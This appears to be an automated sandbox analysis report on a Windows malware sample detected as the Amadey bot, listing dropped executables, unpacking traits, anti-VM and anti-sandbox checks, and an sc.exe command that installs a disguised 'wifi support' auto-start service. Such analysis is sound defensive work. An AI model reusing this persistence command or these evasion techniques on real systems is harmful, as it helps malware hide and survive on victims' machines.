Source:	Binary string: YD_C:\xanofa_towefogeximazu14\pexezi.pdb source: 952.exe, 0000001E.00000000.377588142.0000000000413000.00000002.00020000.sdmp, 952.exe, 0000001E.00000002.411047580.0000000000415000.00000002.00020000.sdmp, 952.exe, 0000001E.00000002.412892690.000000000078E000.00000004.00000020.sdmp, vodibdaj.exe, 0000002C.00000002.417553975.0000000000415000.00000002.00020000.sdmp, vodibdaj.exe, 0000002C.00000000.410165613.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: C:\vuravetabig\lohatevexap\pulirip.pdb source: 3D67.exe, 00000019.00000000.361126589.0000000000413000.00000002.00020000.sdmp, 3D67.exe, 00000019.00000002.372987587.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000001B.00000003.370138407.00000000035D5000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.370897133.00000000035D5000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.369939315.00000000035D5000.00000004.00000001.sdmp
Source:	Binary string: ^$C:\vuravetabig\lohatevexap\pulirip.pdb source: 3D67.exe, 00000019.00000000.361126589.0000000000413000.00000002.00020000.sdmp, 3D67.exe, 00000019.00000002.372987587.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 2819.exe, 00000016.00000000.348562532.0000000000413000.00000002.00020000.sdmp, 2819.exe, 00000016.00000000.361993606.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.426093244.0000000005790000.00000002.00020000.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000001B.00000003.370128323.00000000035CF000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.371827770.00000000035CF000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Unpacked PE file: 29.2.FD2B.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\952.exe	Unpacked PE file: 30.2.952.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe	Unpacked PE file: 44.2.vodibdaj.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe	Unpacked PE file: 44.2.vodibdaj.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Unpacked PE file: 29.2.FD2B.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\952.exe	Unpacked PE file: 30.2.952.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe	Unpacked PE file: 44.2.vodibdaj.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

.NET source code contains method to dynamically call methods (often used by packers)

Show sources

Source: 32.0.13E2.exe.c80000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 32.0.13E2.exe.c80000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 32.2.13E2.exe.c80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 32.0.13E2.exe.c80000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })

Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_00412CF4 push eax; ret
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_00403553 push ecx; ret
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_00404989 push ecx; ret
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_00523C66 push esi; ret
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_00523C01 push esi; ret
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_00533634 push es; iretd
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_2_00401880 push esi; iretd
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_2_00402E94 push es; iretd
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_1_00402E94 push es; iretd
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 20_2_00453C66 push esi; ret
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 20_2_00453C01 push esi; ret
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 20_2_00463634 push es; iretd
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 21_2_00401880 push esi; iretd
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 21_2_00402E94 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_00412CA4 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_00403803 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_00404C39 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_00412DF4 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_00453C66 push esi; ret
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_00453C01 push esi; ret
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_00463634 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 28_2_00401880 push esi; iretd
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 28_2_00402E94 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_004139B0 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00565C53 push ss; retf
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00563EE0 pushad ; ret
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_0056128B push ebx; ret
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00564941 pushfd ; ret
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00564973 pushfd ; ret
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00593C00 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\952.exe	Code function: 30_2_00533A79 push 0000002Bh; iretd

Source: C:\Users\user\Desktop\emPJndhuvA.exe

Code function: 0_2_0040A3DE LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

Source: 13E2.exe.3.dr

Static PE information: 0xA22A793F [Sun Mar 19 11:55:43 2056 UTC]

Source: 5F8C.exe.3.dr	Static PE information: section name: .gizi
Source: 5F8C.exe.3.dr	Static PE information: section name: .bur
Source: 5F8C.exe.3.dr	Static PE information: section name: .wob
Source: 6B74.exe.3.dr	Static PE information: section name: .code
Source: 7E61.exe.3.dr	Static PE information: section name: .code
Source: 9054.exe.3.dr	Static PE information: section name:
Source: 9054.exe.3.dr	Static PE information: section name:
Source: 9054.exe.3.dr	Static PE information: section name:
Source: 9054.exe.3.dr	Static PE information: section name:
Source: 9054.exe.3.dr	Static PE information: section name:
Source: 9054.exe.3.dr	Static PE information: section name:
Source: 9054.exe.3.dr	Static PE information: section name: .T3QbYgM
Source: 9054.exe.3.dr	Static PE information: section name: .adata
Source: B1F6.exe.3.dr	Static PE information: section name:
Source: B1F6.exe.3.dr	Static PE information: section name:
Source: B1F6.exe.3.dr	Static PE information: section name:
Source: B1F6.exe.3.dr	Static PE information: section name:
Source: B1F6.exe.3.dr	Static PE information: section name:
Source: B1F6.exe.3.dr	Static PE information: section name:
Source: B1F6.exe.3.dr	Static PE information: section name: .MYBFBZj
Source: B1F6.exe.3.dr	Static PE information: section name: .adata

Source: B1F6.exe.3.dr	Static PE information: real checksum: 0x364786 should be: 0x36c629
Source: 6B74.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x5a2d0
Source: 7E61.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x58822
Source: 13E2.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x9011f
Source: 9054.exe.3.dr	Static PE information: real checksum: 0x361362 should be: 0x3775f1

Source: initial sample	Static PE information: section name: .text entropy: 7.2566886804
Source: initial sample	Static PE information: section name: entropy: 7.9969707961
Source: initial sample	Static PE information: section name: entropy: 7.91194455639
Source: initial sample	Static PE information: section name: .rsrc entropy: 7.22501727341
Source: initial sample	Static PE information: section name: .T3QbYgM entropy: 7.91938761659
Source: initial sample	Static PE information: section name: entropy: 7.99702918278
Source: initial sample	Static PE information: section name: entropy: 7.8989044999
Source: initial sample	Static PE information: section name: .rsrc entropy: 7.22814628185
Source: initial sample	Static PE information: section name: .MYBFBZj entropy: 7.91954324356

Source: 13E2.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 13E2.exe.3.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 32.0.13E2.exe.c80000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 32.0.13E2.exe.c80000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 32.0.13E2.exe.c80000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 32.0.13E2.exe.c80000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 32.2.13E2.exe.c80000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 32.2.13E2.exe.c80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 32.0.13E2.exe.c80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 32.0.13E2.exe.c80000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 32.0.13E2.exe.c80000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 32.0.13E2.exe.c80000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

Persistence and Installation Behavior:

Yara detected Amadey bot

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Creates files in the system32 config directory

Show sources

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Local\microsoft\IdentityCRL\production\tmpconfig.xml

Jump to behavior

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: unknown

Executable created and started: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\tiftjuh

Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\B1F6.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\2819.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\tiftjuh	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\13E2.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\6B74.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\FD2B.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\3D67.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\7E61.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\45F8.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\CA61.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\5F8C.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe (copy)	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9054.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\952.exe	File created: C:\Users\user\AppData\Local\Temp\vodibdaj.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\952.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe (copy)

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\952.exe

Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create bhlprady binPath= "C:\Windows\SysWOW64\bhlprady\vodibdaj.exe /d\"C:\Users\user\AppData\Local\Temp\952.exe\"" type= own start= auto DisplayName= "wifi support

Source: C:\Users\user\AppData\Local\Temp\952.exe

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\empjndhuva.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\tiftjuh:Zone.Identifier read attributes | delete

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe

Code function: 29_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,FindAtomW,FindAtomW,LoadLibraryA,GetProcAddress,GetProcAddress,

Source: C:\Windows\System32\svchost.exe

Registry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes

Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe	Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

Query firmware table information (likely to detect VMs)

Show sources

Source: C:\Windows\System32\svchost.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: emPJndhuvA.exe, 00000001.00000002.309869367.0000000000549000.00000004.00000020.sdmp

Binary or memory string: ASWHOOK

Found evasive API chain (may stop execution after checking locale)

Show sources

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Checks if the current machine is a virtual machine (disk enumeration)

Show sources

Source: C:\Users\user\Desktop\emPJndhuvA.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tiftjuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tiftjuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tiftjuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tiftjuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tiftjuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tiftjuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Show sources

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00406AA0
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00586CF0

Found evasive API chain (may stop execution after checking computer name)

Show sources

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe

Evasive API call chain: GetComputerName,DecisionNodes,Sleep

Source: C:\Users\user\AppData\Local\Temp\952.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Windows\System32\svchost.exe TID: 5768	Thread sleep time: -30000s >= -30000s
